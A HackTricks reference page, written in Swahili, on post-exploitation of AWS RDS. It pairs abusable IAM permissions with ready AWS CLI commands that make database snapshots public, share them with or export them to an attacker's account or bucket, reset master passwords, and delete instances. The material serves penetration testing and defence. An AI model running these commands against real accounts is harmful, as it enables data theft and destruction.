AWS - RDS Post Exploitation

Support HackTricks

RDS

Kwa maelezo zaidi angalia:

AWS - Relational Database (RDS) Enum

rds:CreateDBSnapshot, rds:RestoreDBInstanceFromDBSnapshot, rds:ModifyDBInstance

Ikiwa mshambuliaji ana ruhusa za kutosha, anaweza kufanya DB iweze kupatikana kwa umma kwa kuunda picha ya DB, na kisha DB inayoweza kupatikana kwa umma kutoka kwenye picha hiyo.

aws rds describe-db-instances # Get DB identifier

aws rds create-db-snapshot \
--db-instance-identifier <db-id> \
--db-snapshot-identifier cloudgoat

# Get subnet groups & security groups
aws rds describe-db-subnet-groups
aws ec2 describe-security-groups

aws rds restore-db-instance-from-db-snapshot \
--db-instance-identifier "new-db-not-malicious" \
--db-snapshot-identifier <scapshotId> \
--db-subnet-group-name <db subnet group> \
--publicly-accessible \
--vpc-security-group-ids <ec2-security group>

aws rds modify-db-instance \
--db-instance-identifier "new-db-not-malicious" \
--master-user-password 'Llaody2f6.123' \
--apply-immediately

# Connect to the new DB after a few mins

rds:ModifyDBSnapshotAttribute, rds:CreateDBSnapshot

Mshambuliaji mwenye ruhusa hizi anaweza kuunda picha ya DB na kuifanya iweze kupatikana hadharani. Kisha, anaweza tu kuunda katika akaunti yake mwenyewe DB kutoka kwa picha hiyo.

Ikiwa mshambuliaji hana rds:CreateDBSnapshot, bado anaweza kufanya picha nyingine zilizoundwa kuwa za umma.

# create snapshot
aws rds create-db-snapshot --db-instance-identifier <db-instance-identifier> --db-snapshot-identifier <snapshot-name>

# Make it public/share with attackers account
aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
## Specify account IDs instead of "all" to give access only to a specific account: --values-to-add {"111122223333","444455556666"}

rds:DownloadDBLogFilePortion

Mshambuliaji mwenye ruhusa ya rds:DownloadDBLogFilePortion anaweza kushusha sehemu za faili za logi za RDS. Ikiwa data nyeti au akreditii za ufikiaji zimeandikwa kwa bahati mbaya, mshambuliaji anaweza kutumia taarifa hii kuongeza mamlaka yao au kufanya vitendo visivyoidhinishwa.

aws rds download-db-log-file-portion --db-instance-identifier target-instance --log-file-name error/mysql-error-running.log --starting-token 0 --output text

Madhara Yanayoweza Kutokea: Ufikiaji wa taarifa nyeti au vitendo visivyoidhinishwa kwa kutumia akreditivu zilizovuja.

rds:DeleteDBInstance

Mshambuliaji mwenye ruhusa hizi anaweza kusababisha DoS kwa mifano ya RDS iliyopo.

# Delete
aws rds delete-db-instance --db-instance-identifier target-instance --skip-final-snapshot

Madhara yanayoweza kutokea: Kufutwa kwa mifano ya RDS iliyopo, na kupoteza data.

rds:StartExportTask

TODO: Jaribu

Mshambuliaji mwenye ruhusa hii anaweza kutoa picha ya mfano wa RDS kwenye kikasha cha S3. Ikiwa mshambuliaji ana udhibiti juu ya kikasha cha S3 kilichokusudiwa, wanaweza kupata data nyeti ndani ya picha iliyotolewa.

aws rds start-export-task --export-task-identifier attacker-export-task --source-arn arn:aws:rds:region:account-id:snapshot:target-snapshot --s3-bucket-name attacker-bucket --iam-role-arn arn:aws:iam::account-id:role/export-role --kms-key-id arn:aws:kms:region:account-id:key/key-id

Madhara yanayoweza kutokea: Ufikiaji wa data nyeti katika picha iliyosafirishwa.

Support HackTricks

Last updated